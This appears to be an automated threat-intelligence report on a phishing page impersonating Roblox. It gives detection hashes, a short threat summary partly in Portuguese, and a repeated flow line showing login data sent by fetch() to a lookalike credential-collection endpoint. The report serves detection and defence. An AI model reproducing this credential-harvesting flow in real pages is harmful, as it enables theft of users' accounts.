Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T17483537292542437617B79CAF064771AA2D3C74FCA8246E1A2F8939A0FD6CE1FC1744E |
|
CONTENT
ssdeep
|
1536:49+XWn9rnFf+YeslHCoYuOCeOXZi7HZ7Hb7Hz7HT7HN7H57HD7Hy7Hv7H37HI7He:g+XW1Ffg2iVuOD75777T7z7t7Z7j7S7l |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
b8474331c798ecbc |
|
VISUAL
aHash
|
0000d3ffc3c3dfff |
|
VISUAL
dHash
|
e8c8b6301e3e3032 |
|
VISUAL
wHash
|
0000c3dfc3c3cfdf |
|
VISUAL
colorHash
|
070020000c0 |
|
VISUAL
cropResistant
|
e8c8b6301e3e3032 |
• Ameaça: Phishing por impersonificação
• Alvo: Usuários do Roblox
• Método: Imitando o site do Roblox
• Exfil: Desconhecido
• Indicadores: Domínio malicioso, código ofuscado
• Risco: Alto
The attacker likely wants to steal Roblox account credentials. They might use a fake login form.
The site could potentially be used to distribute malware or redirect to a malicious website.
Functions: submitForm(), sendData()
User fills <input name='username'> → submitForm() → fetch('https://www.roblox.com.ml/api/submitCredentials') → credentials sent to server
User fills <input name='username'> → submitForm() → fetch('https://www.roblox.com.ml/api/submitCredentials') → credentials sent to server
https://www.roblox.com.ml/js/EnvironmentUrls.jssubmitForm()sendData()Pages with identical visual appearance (based on perceptual hash)
Found 10 other scans for this domain